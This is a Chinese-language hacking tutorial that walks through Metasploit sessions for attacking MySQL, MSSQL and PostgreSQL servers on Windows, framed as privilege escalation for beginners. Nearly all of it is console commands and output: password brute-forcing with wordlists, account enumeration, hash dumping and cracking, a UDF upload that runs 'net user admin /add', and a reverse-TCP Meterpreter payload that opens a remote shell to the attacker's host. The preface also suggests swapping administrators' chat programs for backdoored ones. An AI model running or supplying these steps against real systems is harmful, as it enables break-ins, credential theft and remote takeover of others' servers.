|
前言
其实这篇小说的名字改为WINDOWS环境的数据库攻击更好。。。。。。
现在的入侵是越来越难了,人们的安全意识都普遍提高了不少,连个人用户都懂得防火墙,杀毒软件要装备在手,对于微软的补丁升级也不再是不加问津。因此现在我们想在因特网上扫描弱口令的主机已经几乎是痴心妄想了。(这可是一件大大的好事啊。)
但是这也使得我们作黑客的进行入侵检测达到了一个前所未有的难度。通过各种手段,我们通常并不能直接获得一个系统的管理员权限。比如我们通过某些对IIS的攻击,只能获得IUSR-MACHINENAME的权限(如上传asp木马,以及某些溢出等)。这个帐号通常可是系统默认的guest权限,于是,如何拿到系统管理员或者是system权限,便显得日益重要了。
于是,我就总结了一下大家所经常使用的几种提升权限的方法,以下内容是我整理的,没有什么新的方法,写给和我一样的菜鸟看的。高手们就可以略去了,当然,你要复习我不反对,顺便帮我查查有什么补充
恩,主要是针对数据库的。
如果对方没有你所能利用的服务,也可以替换对方管理员常用的程序,例如QQ,MSN等等,具体替换方法与替换服务一样,只是你的后门什么时候可以启动就得看你的运气了。
还有外部设备没说。。。。
还有改启动项木没说
好多好多懒得写了。。
Mysql数据库
首先得开启外联 WIndows
1
|
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'you password' WITH GRANT OPTION;
|
进行攻击
扫描一个主机
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set RHOSTS 5.5.5.3
RHOSTS => 5.5.5.3
msf auxiliary(mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_login) > set PASS_FILE /pen/msf3/data/wordlists/postgres_default_pass.txt
PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt
msf auxiliary(mysql_login) > exploit
[*] 5.5.5.3:3306 MYSQL - Found remote MySQL version 5.5.16
[*] 5.5.5.3:3306 MYSQL - [1/7] - Trying username:'root' with password:''
[*] 5.5.5.3:3306 MYSQL - [1/7] - failed to login as 'root' with password ''
[*] 5.5.5.3:3306 MYSQL - [2/7] - Trying username:'root' with password:'root'
[*] 5.5.5.3:3306 MYSQL - [2/7] - failed to login as 'root' with password 'root'
[*] 5.5.5.3:3306 MYSQL - [3/7] - Trying username:'root' with password:'tiger'
[*] 5.5.5.3:3306 MYSQL - [3/7] - failed to login as 'root' with password 'tiger'
[*] 5.5.5.3:3306 MYSQL - [4/7] - Trying username:'root' with password:'postgres'
[*] 5.5.5.3:3306 MYSQL - [4/7] - failed to login as 'root' with password 'postgres'
[*] 5.5.5.3:3306 MYSQL - [5/7] - Trying username:'root' with password:'password'
[*] 5.5.5.3:3306 MYSQL - [5/7] - failed to login as 'root' with password 'password'
[*] 5.5.5.3:3306 MYSQL - [6/7] - Trying username:'root' with password:'admin'
[*] 5.5.5.3:3306 MYSQL - [6/7] - failed to login as 'root' with password 'admin'
[*] 5.5.5.3:3306 MYSQL - [7/7] - Trying username:'root' with password:'123456'
[+] 5.5.5.3:3306 - SUCCESSFUL LOGIN 'root' : '123456'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
|
查看结果:
1
2
3
4
5
6
7
8
9
10
11
|
msf auxiliary(mysql_login) > creds
Credentials
===========
host port user pass type active?
---- ---- ---- ---- ---- -------
5.5.5.3 3306 root 123456 password true
[*] Found 1 credential.
msf auxiliary(mysql_login) >
|
查看信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
|
msf exploit(ms10_018_ie_behaviors) > use auxiliary/admin/mysql/mysql_enum
msf auxiliary(mysql_enum) > show options
Module options (auxiliary/admin/mysql/mysql_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 3306 yes The target port
USERNAME no The username to authenticate as
msf auxiliary(mysql_enum) > set PASSWORD 123456
PASSWORD => 123456
msf auxiliary(mysql_enum) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_enum) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf auxiliary(mysql_enum) > exploit
[*] Running MySQL Enumerator...
[*] Enumerating Parameters
[*] MySQL Version: 5.5.16
[*] Compiled for the following OS: Win32
[*] Architecture: x86
[*] Server Hostname: dis9team-a1
[*] Data Directory: C:\xampp\mysql\data\
[*] Logging of queries and logins: OFF
[*] Old Password Hashing Algorithm OFF
[*] Loading of local files: ON
[*] Logins with old Pre-4.1 Passwords: OFF
[*] Allow Use of symlinks for Database Files: YES
[*] Allow Table Merge:
[*] SSL Connection: DISABLED
[*] Enumerating Accounts:
[*] List of Accounts with Password Hashes:
[*] User: root Host: localhost Password Hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*] User: root Host: 127.0.0.1 Password Hash:
[*] User: Host: localhost Password Hash:
[*] User: pma Host: localhost Password Hash:
[*] User: root Host: % Password Hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*] The following users have GRANT Privilege:
[*] User: root Host: localhost
[*] User: root Host: 127.0.0.1
[*] User: root Host: %
[*] The following users have CREATE USER Privilege:
[*] User: root Host: localhost
[*] User: root Host: 127.0.0.1
[*] User: root Host: %
[*] The following users have RELOAD Privilege:
[*] User: root Host: localhost
[*] User: root Host: 127.0.0.1
[*] User: root Host: %
[*] The following users have SHUTDOWN Privilege:
[*] User: root Host: localhost
[*] User: root Host: 127.0.0.1
[*] User: root Host: %
[*] The following users have SUPER Privilege:
[*] User: root Host: localhost
[*] User: root Host: 127.0.0.1
[*] User: root Host: %
[*] The following users have FILE Privilege:
[*] User: root Host: localhost
[*] User: root Host: 127.0.0.1
[*] User: root Host: %
[*] The following users have PROCESS Privilege:
[*] User: root Host: localhost
[*] User: root Host: 127.0.0.1
[*] User: root Host: %
[*] The following accounts have privileges to the mysql database:
[*] User: root Host: localhost
[*] User: root Host: 127.0.0.1
[*] User: root Host: %
[*] Anonymous Accounts are Present:
[*] User: Host: localhost
[*] The following accounts have empty passwords:
[*] User: root Host: 127.0.0.1
[*] User: Host: localhost
[*] User: pma Host: localhost
[*] The following accounts are not restricted by source:
[*] User: root Host: %
[*] Auxiliary module execution completed
msf auxiliary(mysql_enum) >
|
执行语句
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
msf auxiliary(mysql_enum) > use auxiliary/admin/mysql/mysql_sql
msf auxiliary(mysql_sql) > show options
Module options (auxiliary/admin/mysql/mysql_sql):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 3306 yes The target port
SQL select version() yes The SQL to execute.
USERNAME no The username to authenticate as
msf auxiliary(mysql_sql) > set PASSWORD 123456
PASSWORD => 123456
msf auxiliary(mysql_sql) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf auxiliary(mysql_sql) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_sql) > exploit
[*] Sending statement: 'select version()'...
[*] | 5.5.16 |
[*] Auxiliary module execution completed
msf auxiliary(mysql_sql) >
|
导出HASH
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
msf auxiliary(mysql_sql) > use auxiliary/scanner/mysql/mysql_hashdump
msf auxiliary(mysql_hashdump) > show options
Module options (auxiliary/scanner/mysql/mysql_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
THREADS 1 yes The number of concurrent threads
USERNAME no The username to authenticate as
msf auxiliary(mysql_hashdump) > set PASSWORD 123456
PASSWORD => 123456
smsf auxiliary(mysql_hashdump) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_hashdump) > set RHOSTS 5.5.5.3
RHOSTS => 5.5.5.3
msf auxiliary(mysql_hashdump) > exploit
[+] Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] Saving HashString as Loot: root:
[+] Saving HashString as Loot: :
[+] Saving HashString as Loot: pma:
[+] Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] Saving HashString as Loot: dis9team:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*] Hash Table has been saved: /home/brk/.msf4/loot/20120312075809_default_5.5.5.3_mysql.hashes_864135.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_hashdump) >
|
破解HASH
先看数据库的信息 木有木办法破解 必须先导出 工具是编译好的JOHN
1
2
3
4
5
6
7
8
9
10
|
msf auxiliary(mysql_hashdump) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
5.5.5.3 mysql mysql.hashes 5.5.5.3-3306_mysqlhashes.txt text/plain MySQL Hashes /home/brk/.msf4/loot/20120312075903_default_5.5.5.3_mysql.hashes_213052.txt
msf auxiliary(mysql_hashdump) >
|
有了 直接破解
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
|
msf auxiliary(mysql_hashdump) > use auxiliary/analyze/jtr_mysql_fast
msf auxiliary(jtr_mysql_fast) > exploit
[*] HashList: /tmp/jtrtmp20120312-29370-1ra46p8
[*] Trying 'mysql-fast' Wordlist: /tmp/jtrtmp20120312-29370-ojc089
[*] Output: No password hashes loaded (see FAQ)
[*] Trying 'mysql-fast' Rule: All4...
[*] Output: No password hashes loaded (see FAQ)
[*] Trying mysql-fast Rule: Digits5...
[*] Output: No password hashes loaded (see FAQ)
[*] 0 password hashes cracked, 0 left
[*] 0 hashes were cracked!
[*] Trying 'mysql-sha1' Wordlist: /tmp/jtrtmp20120312-29370-ojc089
guesses: 1 time: 0:00:00:00 DONE (Mon Mar 12 07:59:31 2012) c/s: 480 trying: 123321 - 123456
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 1 password hash (MySQL 4.1 double-SHA-1 [mysql-sha1 SSE2])
[*] Output: 123456 (root)
[*] Trying 'mysql-sha1' Rule: All4...
[*] Output: Loaded 1 password hash (MySQL 4.1 double-SHA-1 [mysql-sha1 SSE2])
[*] Output: No password hashes left to crack (see FAQ)
[*] Trying 'mysql-sha1' Rule: Digits5...
[*] Output: Loaded 1 password hash (MySQL 4.1 double-SHA-1 [mysql-sha1 SSE2])
[*] Output: No password hashes left to crack (see FAQ)
[*] root:123456:5.5.5.3:3306
[*] root:123456:5.5.5.3:3306
[*] dis9team:123456:5.5.5.3:3306
[*]
[*] 3 password hashes cracked, 0 left
[*] 3 hashes were cracked!
[+] Host: 5.5.5.3 Port: 3306 User: root Pass: 123456
[+] Host: 5.5.5.3 Port: 3306 User: dis9team Pass: 123456
[*] Auxiliary module execution completed
msf auxiliary(jtr_mysql_fast) >
|
数据库明文记录
1
2
3
4
5
6
7
8
9
10
11
12
|
msf auxiliary(jtr_mysql_fast) > creds
Credentials
===========
host port user pass type active?
---- ---- ---- ---- ---- -------
5.5.5.3 3306 root 123456 password true
5.5.5.3 3306 dis9team 123456 password true
[*] Found 2 credentials.
msf auxiliary(jtr_mysql_fast) >
|
权限提升
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
|
msf auxiliary(mysql_login) > use exploit/windows/mysql/mysql_payload
msf exploit(mysql_payload) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf exploit(mysql_payload) > show options
Module options (exploit/windows/mysql/mysql_payload):
Name Current Setting Required Description
---- --------------- -------- -----------
FORCE_UDF_UPLOAD false no Always attempt to install a sys_exec() mysql.function.
PASSWORD no The password for the specified username
RHOST 5.5.5.3 yes The target address
RPORT 3306 yes The target port
USERNAME root no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 5.5.5.1 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(mysql_payload) > set PASSWORD 123456
PASSWORD => 123456
msf exploit(mysql_payload) > exploit
[*] Started reverse handler on 5.5.5.1:4444
[*] Checking target architecture...
[*] Checking for sys_exec()...
[*] Checking target architecture...
[*] Checking for MySQL plugin directory...
[*] Target arch (win32) and target path both okay.
[*] Uploading lib_mysqludf_sys_32.dll library to C:/xampp/mysql/lib/plugin/CHlQoqQu.dll...
[*] Checking for sys_exec()...
[*] Command Stager progress - 1.47% done (1499/102246 bytes)
[*] Command Stager progress - 2.93% done (2998/102246 bytes)
[*] Command Stager progress - 4.40% done (4497/102246 bytes)
[*] Command Stager progress - 5.86% done (5996/102246 bytes)
[*] Command Stager progress - 7.33% done (7495/102246 bytes)
[*] Command Stager progress - 8.80% done (8994/102246 bytes)
[*] Command Stager progress - 10.26% done (10493/102246 bytes)
[*] Command Stager progress - 11.73% done (11992/102246 bytes)
[*] Command Stager progress - 13.19% done (13491/102246 bytes)
[*] Command Stager progress - 14.66% done (14990/102246 bytes)
[*] Command Stager progress - 16.13% done (16489/102246 bytes)
[*] Command Stager progress - 17.59% done (17988/102246 bytes)
[*] Command Stager progress - 19.06% done (19487/102246 bytes)
[*] Command Stager progress - 20.53% done (20986/102246 bytes)
[*] Command Stager progress - 21.99% done (22485/102246 bytes)
[*] Command Stager progress - 23.46% done (23984/102246 bytes)
[*] Command Stager progress - 24.92% done (25483/102246 bytes)
[*] Command Stager progress - 26.39% done (26982/102246 bytes)
[*] Command Stager progress - 27.86% done (28481/102246 bytes)
[*] Command Stager progress - 29.32% done (29980/102246 bytes)
[*] Command Stager progress - 30.79% done (31479/102246 bytes)
[*] Command Stager progress - 32.25% done (32978/102246 bytes)
[*] Command Stager progress - 33.72% done (34477/102246 bytes)
[*] Command Stager progress - 35.19% done (35976/102246 bytes)
[*] Command Stager progress - 36.65% done (37475/102246 bytes)
[*] Command Stager progress - 38.12% done (38974/102246 bytes)
[*] Command Stager progress - 39.58% done (40473/102246 bytes)
[*] Command Stager progress - 41.05% done (41972/102246 bytes)
[*] Command Stager progress - 42.52% done (43471/102246 bytes)
[*] Command Stager progress - 43.98% done (44970/102246 bytes)
[*] Command Stager progress - 45.45% done (46469/102246 bytes)
[*] Command Stager progress - 46.91% done (47968/102246 bytes)
[*] Command Stager progress - 48.38% done (49467/102246 bytes)
[*] Command Stager progress - 49.85% done (50966/102246 bytes)
[*] Command Stager progress - 51.31% done (52465/102246 bytes)
[*] Command Stager progress - 52.78% done (53964/102246 bytes)
[*] Command Stager progress - 54.24% done (55463/102246 bytes)
[*] Command Stager progress - 55.71% done (56962/102246 bytes)
[*] Command Stager progress - 57.18% done (58461/102246 bytes)
[*] Command Stager progress - 58.64% done (59960/102246 bytes)
[*] Command Stager progress - 60.11% done (61459/102246 bytes)
[*] Command Stager progress - 61.58% done (62958/102246 bytes)
[*] Command Stager progress - 63.04% done (64457/102246 bytes)
[*] Command Stager progress - 64.51% done (65956/102246 bytes)
[*] Command Stager progress - 65.97% done (67455/102246 bytes)
[*] Command Stager progress - 67.44% done (68954/102246 bytes)
[*] Command Stager progress - 68.91% done (70453/102246 bytes)
[*] Command Stager progress - 70.37% done (71952/102246 bytes)
[*] Command Stager progress - 71.84% done (73451/102246 bytes)
[*] Command Stager progress - 73.30% done (74950/102246 bytes)
[*] Command Stager progress - 74.77% done (76449/102246 bytes)
[*] Command Stager progress - 76.24% done (77948/102246 bytes)
[*] Command Stager progress - 77.70% done (79447/102246 bytes)
[*] Command Stager progress - 79.17% done (80946/102246 bytes)
[*] Command Stager progress - 80.63% done (82445/102246 bytes)
[*] Command Stager progress - 82.10% done (83944/102246 bytes)
[*] Command Stager progress - 83.57% done (85443/102246 bytes)
[*] Command Stager progress - 85.03% done (86942/102246 bytes)
[*] Command Stager progress - 86.50% done (88441/102246 bytes)
[*] Command Stager progress - 87.96% done (89940/102246 bytes)
[*] Command Stager progress - 89.43% done (91439/102246 bytes)
[*] Command Stager progress - 90.90% done (92938/102246 bytes)
[*] Command Stager progress - 92.36% done (94437/102246 bytes)
[*] Command Stager progress - 93.83% done (95936/102246 bytes)
[*] Command Stager progress - 95.29% done (97435/102246 bytes)
[*] Command Stager progress - 96.76% done (98934/102246 bytes)
[*] Command Stager progress - 98.19% done (100400/102246 bytes)
[*] Command Stager progress - 99.59% done (101827/102246 bytes)
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
msf exploit(mysql_payload) > sessions
Active sessions
===============
No active sessions.
msf exploit(mysql_payload) >
|
恩?
为什么没反映
了? 其实已经成功鸟=.= 远程链接数据库
执行 :
1
|
SELECT sys_exec('net user admin /add');
|
其实用户已经添加上去了
MSsql数据库
查看破解模块信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > info
Name: MSSQL Login Utility
Version: 7185
License: Metasploit Framework License (BSD)
Provided by:
MC
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEX2BINARY /home/carlos/framework3/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk
MSSQL_PASS no The password for the specified username
MSSQL_PASS_FILE no A dictionary of passwords to perform a bruteforce attempt
MSSQL_USER sa no The username to authenticate as
RHOSTS yes The target address range or CIDR identifier
RPORT 1433 yes The target port
THREADS 1 yes The number of concurrent threads
Description:
This module simply queries the MSSQL instance for a specific
user/pass (default is sa with blank).
|
设置密码字典破解
1
2
3
4
5
6
7
8
9
10
11
12
|
msf auxiliary(mssql_login) > set MSSQL_USER meta
MSSQL_USER => meta
msf auxiliary(mssql_login) > set MSSQL_PASS_FILE /tmp/dict.txt
MSSQL_PASS_FILE => /tmp/dict.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.156
RHOSTS => 192.168.1.156
msf auxiliary(mssql_login) > run
[*] 192.168.1.156:1433 successful logged in as 'meta' with password 'meta'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) >
|
查看MSSQL函数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
|
msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf auxiliary(mssql_enum) > set MSSQL_USER meta
MSSQL_USER => meta
msf auxiliary(mssql_enum) > set MSSQL_PASS meta
MSSQL_USER => meta
msf auxiliary(mssql_enum) > set RHOST 192.168.1.156
RHOST => 192.168.1.156
msf auxiliary(mssql_enum) > run
[*] Running MS SQL Server Enumeration...
[*] Auxiliary module execution completed
msf auxiliary(mssql_enum) > set MSSQL_PASS meta
MSSQL_PASS => meta
msf auxiliary(mssql_enum) > run
[*] Running MS SQL Server Enumeration...
[*] Version:
[*] Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86)
[*] Jul 9 2008 14:43:34
[*] Copyright (c) 1988-2008 Microsoft Corporation
[*] Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
[*] Configuration Parameters:
[*] C2 Audit Mode is Not Enabled
[*] xp_cmdshell is Enabled
[*] remote access is Enabled
[*] allow updates is Not Enabled
[*] Database Mail XPs is Not Enabled
[*] Ole Automation Procedures are Not Enabled
[*] Databases on the server:
[*] Database name:master
[*] Databse Files for master:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\master.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\mastlog.ldf
[*] Database name:tempdb
[*] Databse Files for tempdb:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\tempdb.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\templog.ldf
[*] Database name:model
[*] Databse Files for model:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\model.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\modellog.ldf
[*] Database name:msdb
[*] Databse Files for msdb:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBLog.ldf
[*] System Logins on this Server:
[*] sa
[*] ##MS_SQLResourceSigningCertificate##
[*] ##MS_SQLReplicationSigningCertificate##
[*] ##MS_SQLAuthenticatorCertificate##
[*] ##MS_PolicySigningCertificate##
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] ##MS_AgentSigningCertificate##
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\NETWORK SERVICE
[*] DBSQL2K801\Administrator
[*] dangerlogin
[*] meta
[*] Disabled Accounts:
[*] sa
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] No Accounts Policy is set for:
[*] dangerlogin
[*] meta
[*] Password Expiration is not checked for:
[*] sa
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] dangerlogin
[*] meta
[*] System Admin Logins on this Server:
[*] sa
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\NETWORK SERVICE
[*] DBSQL2K801\Administrator
[*] meta
[*] Windows Logins on this Server:
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\NETWORK SERVICE
[*] DBSQL2K801\Administrator
[*] Windows Groups that can logins on this Server:
[*] No Windows Groups where found with permission to login to system.
[*] Accounts with Username and Password being the same:
[*] meta
[*] Accounts with empty password:
[*] No Accounts with empty passwords where found.
[*] Stored Procedures with Public Execute Permission found:
[*] sp_replsetsyncstatus
[*] sp_replcounters
[*] sp_replsendtoqueue
[*] sp_resyncexecutesql
[*] sp_prepexecrpc
[*] sp_repltrans
[*] sp_xml_preparedocument
[*] xp_qv
[*] xp_getnetname
[*] sp_releaseschemalock
[*] sp_refreshview
[*] sp_replcmds
[*] sp_unprepare
[*] sp_resyncprepare
[*] sp_createorphan
[*] xp_dirtree
[*] sp_replwritetovarbin
[*] sp_replsetoriginator
[*] sp_xml_removedocument
[*] sp_repldone
[*] sp_reset_connection
[*] xp_fileexist
[*] xp_fixeddrives
[*] sp_getschemalock
[*] sp_prepexec
[*] xp_revokelogin
[*] sp_resyncuniquetable
[*] sp_replflush
[*] sp_resyncexecute
[*] xp_grantlogin
[*] sp_droporphans
[*] xp_regread
[*] sp_getbindtoken
[*] sp_replincrementlsn
[*] Instances found on this server:
[*] MSSQLSERVER
[*] TESTINST
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*] NT AUTHORITY\NETWORK SERVICE
[*] Instance TESTINST SQL Server Service is running under the privilage of:
[*] LocalSystem
[*] Auxiliary module execution completed
msf auxiliary(mssql_enum) >
|
取得权限
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(mssql_payload) > set RHOST 92.168.1.156
RHOST => 92.168.1.156
msf exploit(mssql_payload) > set MSSQL_USER meta
MSSQL_USER => meta
msf exploit(mssql_payload) > set MSSQL_PASS meta
MSSQL_PASS => meta
msf exploit(mssql_payload) > exploit
msf exploit(mssql_payload) > exploit
[*] Started reverse handler on port 4444
[*] Warning: This module will leave fGDpiveA.exe in the SQL Server %TEMP% directory
[*] Writing the debug.com loader to the disk...
[*] Converting the debug script to an executable...
[*] Uploading the payload, please be patient...
[*] Converting the encoded payload...
[*] Executing the payload...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.156:1708)
meterpreter > sysinfo
|
postgresql
暴力破解一个主机
1
2
|
msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) >
|
字典等等已经设置好了 你可以默认也可以子机改
我直接运行了 我的密码都是 123456 =.=
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
|
msf auxiliary(postgres_login) > exploit
[*] 5.5.5.3:5432 Postgres - [01/14] - Trying username:'postgres' with password:'' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'postgres':''
[-] 5.5.5.3:5432 Postgres - [01/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [02/14] - Trying username:'' with password:'' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: '':''
[-] 5.5.5.3:5432 Postgres - [02/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [03/14] - Trying username:'scott' with password:'' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'scott':''
[-] 5.5.5.3:5432 Postgres - [03/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [04/14] - Trying username:'admin' with password:'' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'admin':''
[-] 5.5.5.3:5432 Postgres - [04/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [05/14] - Trying username:'postgres' with password:'postgres' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'postgres':'postgres'
[-] 5.5.5.3:5432 Postgres - [05/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [06/14] - Trying username:'scott' with password:'scott' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'scott':'scott'
[-] 5.5.5.3:5432 Postgres - [06/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [07/14] - Trying username:'admin' with password:'admin' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'admin':'admin'
[-] 5.5.5.3:5432 Postgres - [07/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [08/14] - Trying username:'postgres' with password:'password' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'postgres':'password'
[-] 5.5.5.3:5432 Postgres - [08/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [09/14] - Trying username:'postgres' with password:'admin' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'postgres':'admin'
[-] 5.5.5.3:5432 Postgres - [09/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [10/14] - Trying username:'admin' with password:'password' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'admin':'password'
[-] 5.5.5.3:5432 Postgres - [10/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [11/14] - Trying username:'postgres' with password:'123456' on database 'template1'
[+] 5.5.5.3:5432 Postgres - Logged in to 'template1' with 'postgres':'123456'
[+] 5.5.5.3:5432 Postgres - Success: postgres:123456 (Database 'template1' succeeded.)
[*] 5.5.5.3:5432 Postgres - Disconnected
[*] 5.5.5.3:5432 Postgres - [12/14] - Trying username:'' with password:'123456' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: '':'123456'
[-] 5.5.5.3:5432 Postgres - [12/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [13/14] - Trying username:'scott' with password:'123456' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'scott':'123456'
[-] 5.5.5.3:5432 Postgres - [13/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [14/14] - Trying username:'admin' with password:'123456' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'admin':'123456'
[-] 5.5.5.3:5432 Postgres - [14/14] - Username/Password failed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(postgres_login) >
|
成功一个 果然123456
查询版本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
msf auxiliary(postgres_login) > use auxiliary/scanner/postgres/postgres_version
msf auxiliary(postgres_version) > show options
Module options (auxiliary/scanner/postgres/postgres_version):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
PASSWORD no The password for the specified username. Leave blank for a random password.
RHOSTS yes The target address range or CIDR identifier
RPORT 5432 yes The target port
THREADS 1 yes The number of concurrent threads
USERNAME postgres yes The username to authenticate as
